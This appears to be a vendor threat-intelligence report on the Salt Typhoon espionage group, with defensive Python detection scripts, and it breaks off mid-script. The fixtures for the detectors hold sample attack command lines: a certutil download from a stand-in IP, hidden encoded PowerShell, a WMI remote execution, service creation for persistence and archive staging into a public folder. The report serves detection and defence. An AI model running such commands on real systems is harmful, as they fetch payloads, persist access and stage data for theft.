Salt Typhoon is a highly sophisticated and persistent cyber espionage group conclusively attributed to China’s Ministry of State Security (MSS).1 Operating under various aliases, including Earth Estries and Ghost Emperor, the group executes long-term, stealth-oriented campaigns aligned with the strategic objectives of the Chinese state.2 Its primary mission is not financial gain or disruptive sabotage but sustained intelligence gathering, focusing on critical infrastructure, government entities, and technology sectors globally.2
The group’s landmark operation, the 2024 compromise of at least nine major U.S. telecommunications providers, has been described by senior U.S. officials as the “worst telecom hack in our nation’s history”.1 This intrusion demonstrated a breathtaking level of sophistication, enabling the actor to access not only vast amounts of subscriber metadata but also the content of legally authorized law enforcement wiretaps, effectively turning a U.S. intelligence tool into a foreign surveillance asset.1 The targets of this surveillance reportedly included high-level U.S. political figures, underscoring the group’s focus on espionage at the highest levels of power.1
Salt Typhoon’s methodology is characterized by a pragmatic and patient approach. The group overwhelmingly favors exploiting known, unpatched vulnerabilities in public-facing infrastructure and employs an extensive repertoire of “Living off the Land” (LotL) techniques.5 By using legitimate system tools like PowerShell and WMI, they blend seamlessly with normal administrative activity, allowing them to maintain a low-and-slow presence and evade detection for months or even years.4 This is augmented by a custom arsenal of advanced malware, including the Demodex kernel-mode rootkit and the GhostSpider backdoor, which are deployed for stealth, persistence, and data exfiltration in high-value environments.1
Countering a state-sponsored adversary of this caliber requires a fundamental shift away from reactive, signature-based security models. An effective defense must be proactive, intelligence-led, and founded on the principle of “assume breach.” Mjolnir Security delivers a suite of integrated services designed specifically to address this type of advanced, persistent threat. Our Threat Hunting as a Service (THaaS) actively seeks out the subtle behavioral indicators of LotL activity that automated tools miss. Our Digital Forensics and Incident Response (DFIR) teams possess the deep expertise required to uncover and eradicate entrenched adversaries, even those using advanced anti-forensic tools like rootkits. Finally, our Proactive Security Assessments and Virtual CISO (vCISO) services provide the strategic oversight and tactical validation necessary to harden defenses and build long-term organizational resilience against the persistent threat posed by Salt Typhoon.
Part I: Anatomy of a Digital Ghost – Profiling Salt Typhoon
Section 1: Identity, Attribution, and Geopolitical Mandate
1.1 Attribution to China’s Ministry of State Security (MSS)
There is a broad consensus within the global intelligence and cybersecurity communities that Salt Typhoon operates as an operational arm of the People’s Republic of China’s (PRC) Ministry of State Security (MSS).1 The MSS is China’s primary civilian intelligence, security, and secret police agency, responsible for both foreign intelligence and domestic counter-intelligence. The attribution of Salt Typhoon to the MSS is not based on a single piece of evidence but on a convergence of technical indicators, strategic objectives, and official government actions.
The group’s campaigns are characterized by a focus on targets that align directly with the known intelligence requirements of the Chinese state: military technology, sensitive intellectual property, political intelligence on foreign adversaries, and deep access into global critical infrastructure.2 Unlike financially motivated cybercrime syndicates, Salt Typhoon’s activities do not involve ransomware or overt extortion; their currency is information and strategic access.4 This espionage-centric mission is a hallmark of state-sponsored operations.
Official actions by the U.S. government have solidified this attribution. The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have issued joint advisories confirming and detailing the group’s campaigns against U.S. infrastructure.10 Furthermore, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) has taken the significant step of sanctioning entities, such as Sichuan Juxinhe Network Technology Co., LTD., for their direct involvement with Salt Typhoon’s operations.4 These formal government actions represent a high-confidence assessment of the group’s linkage to the MSS. As is standard diplomatic practice, the Chinese government has denied all allegations, labeling them “unfounded and irresponsible smears”.1
1.2 The “Typhoon” Constellation: A Family of Threats
Salt Typhoon does not operate in a vacuum. It is one of several major PRC-linked threat actors designated by Microsoft and other researchers with the “Typhoon” suffix, each appearing to have a distinct yet complementary mission set.10 Understanding Salt Typhoon’s role requires seeing it as part of a larger, coordinated national cyber strategy. The primary actors in this constellation include:
Salt Typhoon: The premier espionage and surveillance specialist. Its focus is on long-term, stealthy infiltration of high-value networks—particularly telecommunications—to conduct surveillance and exfiltrate sensitive data.4 Its goal is intelligence acquisition.
Volt Typhoon: The strategic pre-positioning specialist. This group focuses on gaining and maintaining persistent access to critical infrastructure networks (e.g., energy, water, transportation) in the U.S. and its territories. Its activities are widely seen as preparation for potential future disruptive or destructive attacks in the event of a geopolitical conflict.3 Its goal is operational readiness.
Flax Typhoon: The infrastructure and logistics specialist. This actor is known for compromising a vast number of Internet of Things (IoT) and Small Office/Home Office (SOHO) devices to build large-scale botnets. This network of compromised devices serves as operational relay infrastructure for other Chinese APT groups, helping to obfuscate their origins and launch attacks.3 Its goal is to build and maintain the tools of cyber warfare.
The distinct but interlocking missions of these groups—intelligence (Salt), operations (Volt), and logistics (Flax)—are not coincidental. They mirror the classical structure of a modern military or intelligence directorate. This suggests that these are not disparate, competing hacking groups but rather specialized divisions within a unified command, likely the MSS, each executing a specific part of a comprehensive national cyber strategy. An intrusion by one actor could be a precursor to, or supported by, the activities of another. Therefore, defending against the espionage of Salt Typhoon requires the strategic awareness that the same adversary may possess latent disruptive capabilities through its sibling groups.
1.3 A Threat Actor of Many Names
The challenge of tracking this adversary is compounded by the variety of names used by different cybersecurity vendors. While this is common in threat intelligence, it underscores the need for careful correlation. Microsoft’s designation, Salt Typhoon, has become the most widely adopted moniker.1 Key aliases include:
Salt Typhoon: Microsoft
Earth Estries: Trend Micro 1
Ghost Emperor: Kaspersky Lab 1
FamousSparrow: ESET 1
UNC2286: Mandiant 1
LIMINAL PANDA: Adarma 6
This report will primarily use the name Salt Typhoon for clarity and consistency.
Section 2: The Anthropology of a State Espionage Group
To effectively defend against Salt Typhoon, it is crucial to move beyond a purely technical analysis of their tools and understand the organizational culture, structure, and operational philosophy that drives their actions. Their behavior reveals a mature, professional, and highly organized entity.
2.1 Organizational Structure: A Division of Labor
Evidence strongly indicates that Salt Typhoon is not a monolithic entity but a well-organized collective with a clear division of labor.1 Trend Micro’s analysis suggests that attacks targeting different regions and industries are launched by distinct teams, and that the command-and-control (C2) infrastructure is managed by separate, specialized units.1
This compartmentalized and specialized structure provides several strategic advantages. It allows for the simultaneous execution of multiple, complex campaigns across the globe without operational interference. It builds deep subject-matter expertise within teams, enabling them to become highly effective at targeting specific sectors (like telecommunications) or technologies (like Cisco routers). Finally, this structure enhances operational security and resilience; the disruption or discovery of one team or its infrastructure is less likely to compromise the entire organization. This model is not indicative of a loose collective of hackers but of a professional, state-directed enterprise with a formal organizational chart, project management, and long-term strategic planning.
2.2 Operational Philosophy: The Primacy of Stealth and Persistence
The core cultural tenet of Salt Typhoon is the prioritization of stealth and persistence above all else. Their primary objective is to establish and maintain long-term, undetected access to target networks to facilitate continuous intelligence gathering.4 This philosophy is evident in their exceptionally long dwell times, with campaigns often remaining active for one to two years, or even longer, before discovery.1
This focus on stealth manifests directly in their TTPs. They meticulously cover their tracks, employing anti-forensic techniques such as disabling or clearing system logs to frustrate investigators.8 Their preference for “Living off the Land” techniques is a direct expression of this philosophy, as using legitimate, built-in system tools allows their malicious activities to be hidden in the noise of normal network administration.11 This patient, low-and-slow approach is the behavioral signature of an espionage agency, not a smash-and-grab cybercriminal.
2.3 A Pragmatic and Resourceful Arsenal
Salt Typhoon’s approach to tooling reflects a culture of professional pragmatism and efficiency. They are not dogmatic about using only custom-built tools. The organization invests significant resources in developing highly sophisticated, bespoke malware when the mission demands it. The Demodex kernel-mode rootkit, for example, is a complex piece of software designed to provide the highest level of stealth on modern, hardened operating systems—a tool reserved for the most critical operations.1
At the same time, the group demonstrates resourcefulness by leveraging the broader cybercrime ecosystem. They have been observed using shared backdoors like SnappyBee, which are common among Chinese APT actors, and potentially utilizing Malware-as-a-Service (MaaS) platforms.9 This approach is highly efficient. It conserves the time and expense of in-house development for more common tasks, freeing up their top-tier developers to focus on unique, high-impact tools like Demodex. This blended arsenal of bespoke, shared, and commodity tools is the hallmark of a mature, well-funded, and operationally efficient intelligence organization that makes calculated decisions based on a cost-benefit analysis of its operational needs.
Section 3: A History of High-Stakes Espionage
Salt Typhoon’s operational history, active since at least 2019, reveals a consistent and strategic pattern of targeting that underscores its mission as a global intelligence-gathering apparatus for the Chinese state.8
3.1 Global Victimology
While the group’s most high-profile attacks have been against the United States, its operational footprint is global, with confirmed victims on nearly every continent.1 This worldwide reach demonstrates the breadth of the PRC’s strategic interests. Analysis of their campaigns reveals a clear and consistent targeting doctrine focused on sectors that yield the highest intelligence value:
Telecommunications and Internet Service Providers (ISPs): This is Salt Typhoon’s primary target set. By compromising the core infrastructure of companies like Verizon, AT&T, and T-Mobile in the U.S., as well as telcos in South Africa, Thailand, and Italy, the group gains a powerful vantage point for mass surveillance and access to immense volumes of data-in-transit.1
Government Agencies: Direct targeting of government networks provides access to sensitive political, policy, and national security information.1
Technology and Cybersecurity Firms: These targets are valuable for two reasons: the theft of valuable intellectual property and for counterintelligence purposes, allowing the MSS to understand and potentially subvert the capabilities of those trying to track them.2
Hospitality Sector: The repeated targeting of hotels worldwide is a classic intelligence tactic.1 It is likely used to monitor the movements, meetings, and communications of high-value foreign government officials, diplomats, and business executives traveling abroad.
3.2 Case Study: The 2024 U.S. Telecommunications Breach
The campaign against U.S. telecommunications providers, which began as early as 2022 but was publicly disclosed in late 2024, stands as Salt Typhoon’s most audacious and impactful operation to date.1 It serves as a masterclass in the group’s capabilities and strategic intent.
The Targets: The intrusion was sweeping, compromising at least nine major U.S. providers, including industry giants Verizon, AT&T, T-Mobile, Lumen Technologies, and Spectrum.1
The Method: The attackers gained initial access and moved laterally by exploiting known vulnerabilities in core network equipment, particularly routers and switches manufactured by Cisco.1 This highlights their strategy of targeting systemic weaknesses in patch management across an entire industry sector.
The Crowning Achievement: The most alarming aspect of the breach was the group’s successful infiltration of the systems used by telecom companies to comply with the Communications Assistance for Law Enforcement Act (CALEA).1 CALEA requires carriers to build capabilities into their networks that allow for court-authorized electronic surveillance (wiretapping). By compromising these systems, Salt Typhoon achieved a staggering intelligence victory. They gained access to the metadata of millions of calls and text messages, including phone numbers, IP addresses, and timestamps, primarily from the Washington D.C. metro area.1 In some cases, they were able to obtain the actual audio recordings from these legally authorized wiretaps.1
The High-Value Surveillance: The intelligence gathered was not indiscriminate. The surveillance reportedly targeted the communications of senior U.S. officials and political figures, including staff from the 2024 Kamala Harris presidential campaign and phones associated with Donald Trump and JD Vance.1 This demonstrates a clear and specific objective: to gather high-level political intelligence on U.S. leadership and the electoral process.
The implications of this single operation are profound. By compromising the CALEA system, Salt Typhoon did more than just steal data; they subverted a critical tool of U.S. law enforcement and intelligence. They effectively transformed a U.S. government asset into their own foreign intelligence collection platform. This move reveals a third-order level of strategic thinking. The first-order effect is the hack itself. The second-order effect is access to customer data. The third-order effect, which Salt Typhoon achieved, is gaining insight into the U.S. government’s own intelligence priorities—by seeing who the U.S. is targeting for surveillance—and then piggybacking on that collection. This demonstrates an exceptionally sophisticated understanding of U.S. infrastructure and a bold strategic mandate far beyond simple data theft.
The U.S. government’s response has been correspondingly severe, with Senator Mark Warner, Chair of the Senate Intelligence Committee, calling it the “worst telecom hack in our nation’s history” and making prior Russian cyber operations look like “child’s play” in comparison.7 The aftermath has included a multi-agency investigation, a $10 million FBI bounty for information on Salt Typhoon members, Treasury Department sanctions, and a push by the FCC for new, mandatory cybersecurity regulations for the entire telecommunications industry.1
Part II: The Digital Battlefield – Tactics, Techniques, and Tools
Salt Typhoon’s operational methodology is a carefully balanced blend of exploiting common weaknesses and deploying highly advanced, custom capabilities. Their tactics, techniques, and procedures (TTPs), when mapped to a framework like MITRE ATT&CK®, reveal the behavioral patterns of a patient, adaptable, and stealth-focused adversary.
Section 4: The Salt Typhoon Attack Lifecycle: A Behavioral Analysis
4.1 Initial Access (TA0001): Exploiting the Seams
Salt Typhoon’s primary entry strategy is a pragmatic exploitation of poor cyber hygiene. They consistently target publicly known, and often old, vulnerabilities in internet-facing servers, firewalls, and other network appliances.2 This approach is not born of simplicity but of strategic efficiency; it is often easier and less risky to find an unpatched system than to burn a valuable zero-day exploit. Key vulnerabilities frequently leveraged by the group include:
Microsoft Exchange Server: The ProxyLogon family of vulnerabilities (CVE-2021-26855, etc.) has been a favored entry point.10
Cisco IOS XE Software: Vulnerabilities like CVE-2023-20198 and CVE-2023-20273 were instrumental in the U.S. telecom breach, allowing for privilege escalation and root access.8
VPN Appliances: Flaws in Ivanti Connect Secure (CVE-2024-21887, CVE-2023-46805) and other VPNs are commonly exploited.2
Firewalls: Vulnerabilities such as a code injection flaw in Sophos Firewalls (CVE-2022-3236) have also been used.10
As a secondary method, the group also conducts targeted spear-phishing campaigns designed to trick key individuals into executing malicious payloads.2
4.2 Execution & Persistence (TA0002, TA0003): Living off the Land
Once inside a network, Salt Typhoon’s core behavioral trait is its extensive use of “Living off the Land” (LotL) techniques.2 This involves abusing legitimate, pre-installed system administration tools to carry out their objectives. This tactic is highly effective for defense evasion, as it allows their malicious activity to blend in with the noise of everyday IT operations, making it extremely difficult for traditional endpoint detection and response (EDR) and antivirus (AV) solutions to identify.
Commonly Abused Tools (LOLBINS): Their toolkit includes PowerShell for scripting and remote execution, Windows Management Instrumentation (WMI) for execution and lateral movement, PsExec for remote control, and utilities like BITSAdmin, CertUtil, copy.exe, and rar.exe for file transfer and data staging.2
Persistence Mechanisms: To ensure their access survives reboots and remediation attempts, Salt Typhoon employs multiple persistence techniques. These range from simple methods like modifying Windows Registry run keys to creating hidden Windows Services that launch their malware.4 For their most critical targets, they deploy advanced backdoors and the Demodex rootkit, which provides the ultimate form of stealthy persistence.12
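Because the binaries listed above are legitimate, hunting for their abuse means hunting for how they are invoked rather than whether they ran. The following Python script is an added illustration for this briefing, not Mjolnir Security tooling or code from any cited vendor report. It applies command-line rules for the LOLBIN and persistence patterns named in this section to Sysmon-style process-creation records, then ranks hosts by how many distinct techniques fired on them. The event records, host and account names, field names and the encoded PowerShell string (which simply encodes a run of the letter A) are all constructed for the example; the ATT&CK technique IDs are the standard ones for each behaviour.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation records (Event ID 1) written for this
# example. Hosts, users, addresses and command lines are invented.
SAMPLE_EVENTS = [
    {"host": "ws-042", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/u.txt C:\\Users\\Public\\u.txt"},
    {"host": "ws-042", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     # Placeholder payload: base64 of UTF-16LE "AAAAAAAAAAAAAAA", nothing executable.
     "cmdline": "powershell.exe -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"},
    {"host": "srv-db-01", "user": "CORP\\adm-tlee",
     "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": "wmic /node:srv-file-02 process call create \"cmd /c whoami\""},
    {"host": "srv-db-01", "user": "CORP\\adm-tlee",
     "image": "C:\\Program Files\\WinRAR\\Rar.exe",
     "cmdline": "rar.exe a C:\\Users\\Public\\Music\\m.rar C:\\Users\\adm-tlee\\Documents\\*.docx"},
    {"host": "srv-db-01", "user": "CORP\\adm-tlee",
     "image": "C:\\Windows\\System32\\sc.exe",
     "cmdline": "sc create WinHelpSvc binPath= \"C:\\ProgramData\\w.exe\" start= auto"},
    # Benign administrative activity that must not fire.
    {"host": "ws-017", "user": "CORP\\itops",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"host": "bkp-01", "user": "CORP\\svc_backup",
     "image": "C:\\Program Files\\WinRAR\\Rar.exe",
     "cmdline": "rar.exe a E:\\backups\\site.rar D:\\www"},
    {"host": "ws-017", "user": "CORP\\itops",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -hashfile C:\\iso\\image.iso SHA256"},
]

# (rule name, ATT&CK technique, regex applied to "<image basename> <command line>" lower-cased)
RULES = [
    ("certutil used to download or decode a payload", "T1105",
     r"\bcertutil(\.exe)?\b.*(-urlcache|-decode|-encode)"),
    ("bitsadmin used to transfer files", "T1105",
     r"\bbitsadmin(\.exe)?\b.*(/transfer|/addfile|/create)"),
    ("hidden or encoded PowerShell", "T1059.001",
     r"\bpowershell(\.exe)?\b.*(-enc\w*\s+[a-z0-9+/=]{20,}|-w(indowstyle)?\s+hidden)"),
    ("remote process creation through WMI", "T1047",
     r"\bwmic(\.exe)?\b.*/node:.*\bprocess\s+call\s+create\b"),
    ("PsExec-style remote service execution", "T1021.002",
     r"\bpsexe(c|svc)(\.exe)?\b"),
    ("archive written to a public staging directory", "T1560.001",
     r"\b(rar|winrar|makecab)(\.exe)?\b.*\\users\\public\\"),
    ("Run-key persistence through reg.exe", "T1547.001",
     r"\breg(\.exe)?\s+add\b.*\\currentversion\\run\b"),
    ("service persistence through sc.exe", "T1543.003",
     r"\bsc(\.exe)?\s+create\b"),
]
COMPILED = [(name, tid, re.compile(pat)) for name, tid, pat in RULES]


def hunt(events):
    """Return one finding per (event, rule) pair whose command line matches."""
    findings = []
    for ev in events:
        # Prefix the image basename so a rule still fires when the command line
        # omits the executable name.
        text = (PureWindowsPath(ev["image"]).name + " " + ev["cmdline"]).lower()
        for name, tid, rx in COMPILED:
            if rx.search(text):
                findings.append({"host": ev["host"], "user": ev["user"],
                                 "technique": tid, "rule": name, "cmdline": ev["cmdline"]})
    return findings


def summarize_by_host(findings):
    """Group findings per host; several distinct techniques on one host is the
    chained LotL pattern worth escalating first."""
    hosts = defaultdict(lambda: {"findings": 0, "techniques": set()})
    for f in findings:
        hosts[f["host"]]["findings"] += 1
        hosts[f["host"]]["techniques"].add(f["technique"])
    for h in hosts.values():
        h["severity"] = "high" if len(h["techniques"]) >= 2 else "medium"
    return dict(hosts)


if __name__ == "__main__":
    for host, info in summarize_by_host(hunt(SAMPLE_EVENTS)).items():
        print(f"{host}: {info['severity']} ({info['findings']} findings, "
              f"{sorted(info['techniques'])})")
```

In practice the rules would be tuned against a baseline of the environment's own administrative scripts (the benign records above show why the patterns key on arguments such as -urlcache, hidden windows or a public output directory rather than on the binary name alone), and the per-host roll-up is what turns single noisy hits into a hunting lead.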
4.3 Lateral Movement (TA0008): Spreading Silently
The group’s movement within a compromised network is methodical and designed to avoid detection. After harvesting credentials, they use them to access other systems. Key techniques include:
Credential-Based Attacks: Using tools like Mimikatz to extract credentials from memory, they perform Pass-the-Hash (PtH) and NTLM Relay attacks to authenticate to other machines without needing plaintext passwords.5
Abuse of Remote Protocols: They leverage their stolen credentials to use standard administrative protocols like Remote Desktop Protocol (RDP) and Server Message Block (SMB) to move laterally and access file shares.4
Remote Execution: PowerShell Remoting and WMI are used to execute commands and scripts on remote systems, further spreading their foothold across the network.5
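The credential-reuse techniques listed above leave a characteristic shape in Windows logon telemetry, and the fan-out of one account across many hosts in a short window is often the first visible sign of lateral movement. The Python script below is an added example for this briefing, not Mjolnir Security's tooling; it applies two widely used heuristics to Security Event ID 4624 records: a source-side NewCredentials logon through the seclogo logon process, and destination-side NTLM network logons with a 0-bit session key (where legitimate NTLM logons normally negotiate a 128-bit key), correlated per account into a fan-out across several hosts within ten minutes. The records, host and account names, thresholds and field names are constructed for the example, and both heuristics produce leads that need corroboration rather than verdicts.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security Event ID 4624 (successful logon) records for this example.
# "dest_host" is the machine that logged the event; every value is invented.
SAMPLE_LOGONS = [
    # Ordinary interactive Kerberos logon: expected, never flagged.
    {"time": "2024-05-01T08:55:00", "dest_host": "ws-023", "account": "CORP\\jdoe",
     "logon_type": 2, "auth_package": "Kerberos", "logon_process": "Kerberos",
     "key_length": 0, "src_ip": "-"},
    # Source-side signal: Logon Type 9 (NewCredentials) via the "seclogo" logon
    # process. "runas /netonly" produces the same shape, so this is a lead, not proof.
    {"time": "2024-05-01T09:02:00", "dest_host": "ws-023", "account": "CORP\\jdoe",
     "logon_type": 9, "auth_package": "Negotiate", "logon_process": "seclogo",
     "key_length": 0, "src_ip": "::1"},
    # Destination-side signal: NTLM network logons with a 0-bit session key from
    # one source to three servers within four minutes.
    {"time": "2024-05-01T09:03:10", "dest_host": "srv-file-01", "account": "CORP\\adm-tlee",
     "logon_type": 3, "auth_package": "NTLM", "logon_process": "NtLmSsp",
     "key_length": 0, "src_ip": "10.10.5.23"},
    {"time": "2024-05-01T09:04:40", "dest_host": "srv-file-02", "account": "CORP\\adm-tlee",
     "logon_type": 3, "auth_package": "NTLM", "logon_process": "NtLmSsp",
     "key_length": 0, "src_ip": "10.10.5.23"},
    {"time": "2024-05-01T09:07:05", "dest_host": "srv-app-03", "account": "CORP\\adm-tlee",
     "logon_type": 3, "auth_package": "NTLM", "logon_process": "NtLmSsp",
     "key_length": 0, "src_ip": "10.10.5.23"},
    # Legitimate scanner account using NTLM with a 128-bit session key: not PtH-shaped.
    {"time": "2024-05-01T09:05:00", "dest_host": "srv-file-01", "account": "CORP\\svc_scan",
     "logon_type": 3, "auth_package": "NTLM", "logon_process": "NtLmSsp",
     "key_length": 128, "src_ip": "10.10.9.4"},
    {"time": "2024-05-01T09:05:30", "dest_host": "srv-file-02", "account": "CORP\\svc_scan",
     "logon_type": 3, "auth_package": "NTLM", "logon_process": "NtLmSsp",
     "key_length": 128, "src_ip": "10.10.9.4"},
]

FANOUT_HOSTS = 3                      # distinct destinations that make a fan-out
FANOUT_WINDOW = timedelta(minutes=10)  # window in which they must occur


def _t(ev):
    return datetime.fromisoformat(ev["time"])


def is_pth_shaped(ev):
    """Network logon over NTLM with a 0-bit session key in a Kerberos domain."""
    return (ev["logon_type"] == 3 and ev["auth_package"].upper() == "NTLM"
            and ev["logon_process"].lower() == "ntlmssp" and ev["key_length"] == 0)


def is_newcredentials_seclogo(ev):
    """Type 9 logon through seclogo: credentials injected into a new logon session."""
    return (ev["logon_type"] == 9 and ev["logon_process"].lower() == "seclogo"
            and ev["auth_package"].lower() == "negotiate")


def detect_lateral_movement(events):
    findings = []
    pth_by_account = defaultdict(list)
    for ev in sorted(events, key=_t):
        if is_newcredentials_seclogo(ev):
            findings.append({"kind": "source-side NewCredentials logon (seclogo)",
                             "host": ev["dest_host"], "account": ev["account"],
                             "time": ev["time"]})
        if is_pth_shaped(ev):
            pth_by_account[ev["account"]].append(ev)
    for account, evs in pth_by_account.items():
        # Sliding window over this account's PtH-shaped logons, in time order.
        for i, first in enumerate(evs):
            window = [e for e in evs[i:] if _t(e) - _t(first) <= FANOUT_WINDOW]
            dests = sorted({e["dest_host"] for e in window})
            if len(dests) >= FANOUT_HOSTS:
                findings.append({"kind": "NTLM pass-the-hash-shaped fan-out",
                                 "account": account, "destinations": dests,
                                 "sources": sorted({e["src_ip"] for e in window}),
                                 "first_seen": first["time"], "last_seen": window[-1]["time"]})
                break
    return findings


if __name__ == "__main__":
    for f in detect_lateral_movement(SAMPLE_LOGONS):
        print(f)
```

The fan-out logic is the more robust of the two signals because it does not depend on any single event being unambiguous: one NTLM logon with a zero-length key is noise, the same account producing them on three servers in four minutes from one address is a pattern that a human hunter should pull the source workstation's process telemetry for.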
4.4 Defense Evasion (TA0005): The Art of Invisibility
Salt Typhoon dedicates significant effort to evading security controls, which is critical to their long-term operational model. Their techniques are multi-layered:
Hiding Malicious Code: They use DLL sideloading to trick legitimate applications into loading their malicious libraries, and their most advanced malware, like GhostSpider, operates entirely in-memory to avoid file-based scanning.8
Eliminating Evidence: A key TTP is the removal of forensic evidence. They have been observed disabling or clearing system logs to erase the digital breadcrumbs of their activity.8
Obfuscating Communications: Command and control traffic is encrypted and often proxied through a chain of compromised jump hosts or legitimate cloud services to hide the true origin and destination of their C2 servers.2
Kernel-Level Stealth: The deployment of the Demodex rootkit represents their most advanced evasion capability. By operating at the kernel level of the operating system, Demodex can hide malicious files, running processes, registry keys, and network connections from user-mode security tools and forensic investigators.19
This reliance on exploiting poor cyber hygiene and using LotL techniques is not a sign of technical limitation but of strategic discipline. While the group possesses the capability to develop and use zero-day exploits, their preference for the path of least resistance demonstrates a deep understanding that organizational and human failures—such as a system administrator failing to apply a patch—are often more reliable and less risky vulnerabilities to exploit than purely technical ones. This operational doctrine values stealth, patience, and efficiency, targeting process failures as much as technological flaws. A defense strategy focused solely on detecting advanced malware will inevitably fail; it must also address fundamental security posture, administrative discipline, and the detection of anomalous behavior.
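Clearing logs, the evidence-removal step described above, leaves traces of its own, which is what makes it a hunting signal. The Python script below is an added illustration for this briefing, not Mjolnir Security code; it checks constructed Windows event records for the two events Windows itself writes when a log is emptied (Security Event ID 1102 and System Event ID 104) and for EventRecordID values that move backwards within one host's channel, which happens when a log is cleared and its record counter restarts. The record layout and field names are assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime

# Constructed Windows event records for this example (hosts, users, times invented).
SAMPLE_EVENTS = [
    {"host": "srv-01", "channel": "Security", "event_id": 4624, "record_id": 50001,
     "time": "2024-05-01T09:00:00", "user": "CORP\\jdoe"},
    {"host": "srv-01", "channel": "Security", "event_id": 4672, "record_id": 50002,
     "time": "2024-05-01T09:05:00", "user": "CORP\\jdoe"},
    # When the Security log is cleared, Windows writes Event ID 1102 as the first
    # record of the emptied log, so the record counter restarts at 1.
    {"host": "srv-01", "channel": "Security", "event_id": 1102, "record_id": 1,
     "time": "2024-05-01T09:10:00", "user": "CORP\\svc_backup"},
    {"host": "srv-01", "channel": "Security", "event_id": 4624, "record_id": 2,
     "time": "2024-05-01T09:11:00", "user": "CORP\\svc_backup"},
    # The System log records the clearing of any event log as Event ID 104.
    {"host": "srv-02", "channel": "System", "event_id": 104, "record_id": 7781,
     "time": "2024-05-01T10:00:00", "user": "CORP\\adm-tlee"},
    # Healthy host: increasing record IDs and no clearing events.
    {"host": "ws-09", "channel": "Security", "event_id": 4624, "record_id": 200,
     "time": "2024-05-01T10:30:00", "user": "CORP\\mkhan"},
    {"host": "ws-09", "channel": "Security", "event_id": 4634, "record_id": 201,
     "time": "2024-05-01T10:45:00", "user": "CORP\\mkhan"},
]

# Events Windows writes about log clearing, keyed by (channel, event id).
CLEAR_EVENTS = {
    ("Security", 1102): "Security audit log cleared (Event ID 1102)",
    ("System", 104): "event log cleared (Event ID 104)",
}


def detect_log_clearing(events):
    """Return findings for explicit clearing events and for record-ID regressions."""
    findings = []
    by_stream = defaultdict(list)
    for ev in events:
        key = (ev["channel"], ev["event_id"])
        if key in CLEAR_EVENTS:
            findings.append({"host": ev["host"], "time": ev["time"], "user": ev["user"],
                             "indicator": CLEAR_EVENTS[key]})
        by_stream[(ev["host"], ev["channel"])].append(ev)
    # Within one host's channel, EventRecordID only ever grows unless the log was
    # cleared or replaced; a drop is an indicator even if the 1102/104 itself is gone.
    for (host, channel), stream in by_stream.items():
        stream.sort(key=lambda e: datetime.fromisoformat(e["time"]))
        for prev, cur in zip(stream, stream[1:]):
            if cur["record_id"] < prev["record_id"]:
                findings.append({"host": host, "time": cur["time"], "user": cur["user"],
                                 "indicator": f"{channel} EventRecordID fell from "
                                              f"{prev['record_id']} to {cur['record_id']} "
                                              f"(log cleared or replaced)"})
    findings.sort(key=lambda f: datetime.fromisoformat(f["time"]))
    return findings


def hosts_with_cleared_logs(events):
    """Hosts to prioritise for forensic collection from other evidence sources."""
    return sorted({f["host"] for f in detect_log_clearing(events)})


if __name__ == "__main__":
    for f in detect_log_clearing(SAMPLE_EVENTS):
        print(f"{f['time']} {f['host']} {f['user']}: {f['indicator']}")
```

The account recorded on the 1102 or 104 event is itself a lead, and a host that appears in this output is exactly where an investigator should turn to evidence the adversary could not clear: forwarded copies of the logs on a collector, EDR telemetry, and the disk and memory artifacts that the DFIR discussion later in this report relies on.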
4.5 Command & Control (TA0011) and Exfiltration (TA0010)
Salt Typhoon’s C2 infrastructure is sophisticated and resilient. Communications are almost always encrypted and designed to blend with legitimate traffic.2 They often use compromised routers or servers as jump hosts or proxies, making it difficult to trace traffic back to its true source.8 For data exfiltration, they typically stage the data first. This involves collecting sensitive information, compressing it into archives (often using legitimate tools like rar.exe or creating .cab files), and moving it to an inconspicuous directory, such as C:\Users\Public\Music, before transmitting it out of the network.4
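The staging step described above can be hunted on disk as well as in process telemetry, because it leaves archives sitting in directories where archives have no business being. The Python script below is an added example for this briefing, not Mjolnir Security's tooling; it takes file-listing records (constructed inline here) and clusters archive files that appear in commonly abused public or temporary directories within a short time window, flagging a cluster when it is large or contains several files, and noting multi-volume RAR naming. The watched directories, thresholds and field names are assumptions chosen for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

ARCHIVE_EXT = {".rar", ".cab", ".7z", ".zip"}
# Multi-volume RAR sets: name.partNN.rar or the older name.r00, name.r01 scheme.
MULTI_VOLUME = re.compile(r"\.part\d+\.rar$|\.r\d\d$", re.IGNORECASE)
# World-writable or rarely inspected locations commonly used for staging (assumption).
WATCHED_DIRS = ("C:\\Users\\Public\\", "C:\\ProgramData\\",
                "C:\\Windows\\Temp\\", "C:\\PerfLogs\\")
CLUSTER_WINDOW = timedelta(hours=2)
MIN_CLUSTER_BYTES = 50 * 1024 * 1024   # a single archive this large is worth a look
MIN_CLUSTER_FILES = 2                  # several archives together are too

# Constructed file-listing records (path, size in bytes, modification time).
MiB = 1024 * 1024
SAMPLE_FILES = [
    {"path": "C:\\Users\\Public\\Music\\docs.part1.rar", "size": 120 * MiB, "mtime": "2024-05-01T02:10:00"},
    {"path": "C:\\Users\\Public\\Music\\docs.part2.rar", "size": 95 * MiB, "mtime": "2024-05-01T02:25:00"},
    {"path": "C:\\Users\\Public\\Music\\cfg.cab", "size": 3 * MiB, "mtime": "2024-05-01T02:40:00"},
    {"path": "C:\\Windows\\Temp\\tmp8f2.zip", "size": 80 * MiB, "mtime": "2024-05-01T11:15:00"},
    # Single small installer cabinet in ProgramData: candidate, but below both thresholds.
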